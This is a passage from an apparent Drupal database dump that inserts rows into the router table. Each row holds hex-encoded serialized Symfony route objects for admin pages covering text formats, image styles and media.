2636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a36393a227b5e2f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a33383a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.filter_format.enable', '/admin/config/content/formats/manage/{filter_format}/enable', '/admin/config/content/formats/manage/%/enable', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f7b66696c7465725f666f726d61747d2f656e61626c65223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a32303a2266696c7465725f666f726d61742e656e61626c65223b733a363a225f7469746c65223b733a31383a22456e61626c65207465787420666f726d6174223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a32303a2266696c7465725f666f726d61742e656e61626c65223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31333a2266696c7465725f666f726d6174223b613a323a7b733a343a2274797065223b733a32303a22656e746974793a66696c7465725f666f726d6174223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37363a227b5e2f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f283f503c66696c7465725f666f726d61743e5b5e2f5d2b2b292f656e61626c65247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f656e61626c65223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31333a2266696c7465725f666f726d6174223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33363a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31333a2266696c7465725f666f726d6174223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34353a222f61646d696e2f636f6e6669672f636f6e74656e742f666f726d6174732f6d616e6167652f252f656e61626c65223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.image_style.collection', '/admin/config/media/image-styles', '/admin/config/media/image-styles', 15, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a33323a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c6573223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f6c697374223b733a31313a22696d6167655f7374796c65223b733a363a225f7469746c65223b733a31323a22496d616765207374796c6573223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32333a2261646d696e697374657220696d616765207374796c6573223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c6573247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a33323a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c6573223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a31353b733a31343a227061747465726e4f75746c696e65223b733a33323a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c6573223b733a383a226e756d5061727473223b693a343b7d7d, 4),
('entity.image_style.config_translation_overview', '/admin/config/media/image-styles/manage/{image_style}/translate', '/admin/config/media/image-styles/manage/%/translate', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36333a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d2f7472616e736c617465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31313a225f636f6e74726f6c6c6572223b733a37353a225c44727570616c5c636f6e6669675f7472616e736c6174696f6e5c436f6e74726f6c6c65725c436f6e6669675472616e736c6174696f6e436f6e74726f6c6c65723a3a6974656d50616765223b733a393a22706c7567696e5f6964223b733a31313a22696d6167655f7374796c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a33353a225f636f6e6669675f7472616e736c6174696f6e5f6f766572766965775f616363657373223b733a343a2254525545223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33343a22636f6e6669675f7472616e736c6174696f6e2e6163636573732e6f76657276696577223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a38313a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b292f7472616e736c617465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f7472616e736c617465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a35313a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f252f7472616e736c617465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.image_style.delete_form', '/admin/config/media/image-styles/manage/{image_style}/delete', '/admin/config/media/image-styles/manage/%/delete', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a36303a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d2f64656c657465223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31383a22696d6167655f7374796c652e64656c657465223b733a363a225f7469746c65223b733a363a2244656c657465223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31343a225f656e746974795f616363657373223b733a31383a22696d6167655f7374796c652e64656c657465223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37383a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b292f64656c657465247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a373a222f64656c657465223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34383a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f252f64656c657465223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.image_style.edit_form', '/admin/config/media/image-styles/manage/{image_style}', '/admin/config/media/image-styles/manage/%', 62, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35333a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31363a22696d6167655f7374796c652e65646974223b733a363a225f7469746c65223b733a31303a2245646974207374796c65223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32333a2261646d696e697374657220696d616765207374796c6573223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37313a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a36323b733a31343a227061747465726e4f75746c696e65223b733a34313a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f25223b733a383a226e756d5061727473223b693a363b7d7d, 6),
('entity.image_style.flush_form', '/admin/config/media/image-styles/manage/{image_style}/flush', '/admin/config/media/image-styles/manage/%/flush', 125, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a35393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f7b696d6167655f7374796c657d2f666c757368223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31373a22696d6167655f7374796c652e666c757368223b733a363a225f7469746c65223b733a353a22466c757368223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a31313a225f7065726d697373696f6e223b733a32333a2261646d696e697374657220696d616765207374796c6573223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a343a2275746638223b623a313b733a31303a22706172616d6574657273223b613a313a7b733a31313a22696d6167655f7374796c65223b613a323a7b733a343a2274797065223b733a31383a22656e746974793a696d6167655f7374796c65223b733a393a22636f6e766572746572223b733a36333a2264727570616c2e70726f78795f6f726967696e616c5f736572766963652e706172616d636f6e7665727465722e636f6e666967656e746974795f61646d696e223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a37373a227b5e2f61646d696e2f636f6e6669672f6d656469612f696d6167655c2d7374796c65732f6d616e6167652f283f503c696d6167655f7374796c653e5b5e2f5d2b2b292f666c757368247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f666c757368223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31313a22696d6167655f7374796c65223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a33393a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e616765223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31313a22696d6167655f7374796c65223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a3132353b733a31343a227061747465726e4f75746c696e65223b733a34373a222f61646d696e2f636f6e6669672f6d656469612f696d6167652d7374796c65732f6d616e6167652f252f666c757368223b733a383a226e756d5061727473223b693a373b7d7d, 7),
('entity.media.add_form', '/media/add/{media_type}', '/media/add/%', 6, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32333a222f6d656469612f6164642f7b6d656469615f747970657d223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a343a7b733a31323a225f656e746974795f666f726d223b733a393a226d656469612e616464223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b733a31353a225f7469746c655f63616c6c6261636b223b733a36323a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a61646442756e646c655469746c65223b733a31363a2262756e646c655f706172616d65746572223b733a31303a226d656469615f74797065223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32313a225f656e746974795f6372656174655f616363657373223b733a31383a226d656469613a7b6d656469615f747970657d223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a31303a226d656469615f74797065223b613a333a7b733a343a2274797065223b733a31373a22656e746974793a6d656469615f74797065223b733a32313a22776974685f636f6e6669675f6f7665727269646573223b623a313b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32363a226163636573735f636865636b2e656e746974795f637265617465223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a34303a227b5e2f6d656469612f6164642f283f503c6d656469615f747970653e5b5e2f5d2b2b29247d734475223b733a31313a22706174685f746f6b656e73223b613a323a7b693a303b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a363a225b5e2f5d2b2b223b693a333b733a31303a226d656469615f74797065223b693a343b623a313b7d693a313b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f6d656469612f616464223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a31303a226d656469615f74797065223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a363b733a31343a227061747465726e4f75746c696e65223b733a31323a222f6d656469612f6164642f25223b733a383a226e756d5061727473223b693a333b7d7d, 3),
('entity.media.add_page', '/media/add', '/media/add', 3, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31303a222f6d656469612f616464223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a333a7b733a31313a225f636f6e74726f6c6c6572223b733a35353a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a61646450616765223b733a31353a225f7469746c655f63616c6c6261636b223b733a35363a2244727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a6164645469746c65223b733a31343a22656e746974795f747970655f6964223b733a353a226d65646961223b7d733a31323a22726571756972656d656e7473223b613a313a7b733a32353a225f656e746974795f6372656174655f616e795f616363657373223b733a353a226d65646961223b7d733a373a226f7074696f6e73223b613a343a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a33303a226163636573735f636865636b2e656e746974795f6372656174655f616e79223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a31373a227b5e2f6d656469612f616464247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a31303a222f6d656469612f616464223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a333b733a31343a227061747465726e4f75746c696e65223b733a31303a222f6d656469612f616464223b733a383a226e756d5061727473223b693a323b7d7d, 2),
('entity.media.canonical', '/media/{media}/edit', '/media/%/edit', 5, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a31393a222f6d656469612f7b6d656469617d2f65646974223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a323a7b733a31323a225f656e746974795f666f726d223b733a31303a226d656469612e65646974223b733a31353a225f7469746c655f63616c6c6261636b223b733a35383a225c44727570616c5c436f72655c456e746974795c436f6e74726f6c6c65725c456e74697479436f6e74726f6c6c65723a3a656469745469746c65223b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31343a225f656e746974795f616363657373223b733a31323a226d656469612e757064617465223b733a353a226d65646961223b733a333a225c642b223b7d733a373a226f7074696f6e73223b613a353a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31303a22706172616d6574657273223b613a313a7b733a353a226d65646961223b613a323a7b733a343a2274797065223b733a31323a22656e746974793a6d65646961223b733a393a22636f6e766572746572223b733a32313a22706172616d636f6e7665727465722e656e74697479223b7d7d733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a31393a226163636573735f636865636b2e656e74697479223b7d733a343a2275746638223b623a313b7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a323a7b693a303b733a333a22474554223b693a313b733a343a22504f5354223b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a313a7b693a303b733a353a226d65646961223b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a33333a227b5e2f6d656469612f283f503c6d656469613e5c642b292f65646974247d734475223b733a31313a22706174685f746f6b656e73223b613a333a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a353a222f65646974223b7d693a313b613a353a7b693a303b733a383a227661726961626c65223b693a313b733a313a222f223b693a323b733a333a225c642b223b693a333b733a353a226d65646961223b693a343b623a313b7d693a323b613a323a7b693a303b733a343a2274657874223b693a313b733a363a222f6d65646961223b7d7d733a393a22706174685f76617273223b613a313a7b693a303b733a353a226d65646961223b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a353b733a31343a227061747465726e4f75746c696e65223b733a31333a222f6d656469612f252f65646974223b733a383a226e756d5061727473223b693a333b7d7d, 3);
INSERT INTO `router` (`name`, `path`, `pattern_outline`, `fit`, `route`, `number_parts`) VALUES
('entity.media.collection', '/admin/content/media', '/admin/content/media', 7, 0x4f3a33313a2253796d666f6e795c436f6d706f6e656e745c526f7574696e675c526f757465223a393a7b733a343a2270617468223b733a32303a222f61646d696e2f636f6e74656e742f6d65646961223b733a343a22686f7374223b733a303a22223b733a383a2264656661756c7473223b613a353a7b733a31313a225f636f6e74726f6c6c6572223b733a34373a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a68616e646c65223b733a31353a225f7469746c655f63616c6c6261636b223b733a34393a2244727570616c5c76696577735c526f7574696e675c5669657750616765436f6e74726f6c6c65723a3a6765745469746c65223b733a373a22766965775f6964223b733a353a226d65646961223b733a31303a22646973706c61795f6964223b733a31353a226d656469615f706167655f6c697374223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b7d733a31323a22726571756972656d656e7473223b613a323a7b733a31313a225f7065726d697373696f6e223b733a32313a22616363657373206d65646961206f76657276696577223b733a373a225f666f726d6174223b733a343a2268746d6c223b7d733a373a226f7074696f6e73223b613a393a7b733a31343a22636f6d70696c65725f636c617373223b733a33333a2244727570616c5c436f72655c526f7574696e675c526f757465436f6d70696c6572223b733a31383a225f766965775f617267756d656e745f6d6170223b613a303a7b7d733a32333a225f766965775f646973706c61795f706c7567696e5f6964223b733a343a2270616765223b733a32363a225f766965775f646973706c61795f706c7567696e5f636c617373223b733a33383a2244727570616c5c76696577735c506c7567696e5c76696577735c646973706c61795c50616765223b733a33303a225f766965775f646973706c61795f73686f775f61646d696e5f6c696e6b73223b623a313b733a31363a2272657475726e735f726573706f6e7365223b623a303b733a343a2275746638223b623a313b733a31323a225f61646d696e5f726f757465223b623a313b733a31343a225f6163636573735f636865636b73223b613a313a7b693a303b733a32333a226163636573735f636865636b2e7065726d697373696f6e223b7d7d733a373a22736368656d6573223b613a303a7b7d733a373a226d6574686f6473223b613a303a7b7d733a393a22636f6e646974696f6e223b733a303a22223b733a383a22636f6d70696c6564223b4f3a33333a2244727570616c5c436f72655c526f7574696e675c436f6d70696c6564526f757465223a31313a7b733a343a2276617273223b613a303a7b7d733a31313a22706174685f707265666978223b733a303a22223b733a31303a22706174685f7265676578223b733a32373a227b5e2f61646d696e2f636f6e74656e742f6d65646961247d734475223b733a31313a22706174685f746f6b656e73223b613a313a7b693a303b613a323a7b693a303b733a343a2274657874223b693a313b733a32303a222f61646d696e2f636f6e74656e742f6d65646961223b7d7d733a393a22706174685f76617273223b613a303a7b7d733a31303a22686f73745f7265676578223b4e3b733a31313a22686f73745f746f6b656e73223b613a303a7b7d733a393a22686f73745f76617273223b613a303a7b7d733a333a22666974223b693a373b733a31343a227061747465726e4f75746c696e65223b733a32303a222f61646d696e2f636f6e74656e742f6d65646961223b733a383a226e756d5061727473223b693a333b7d7d, 3),
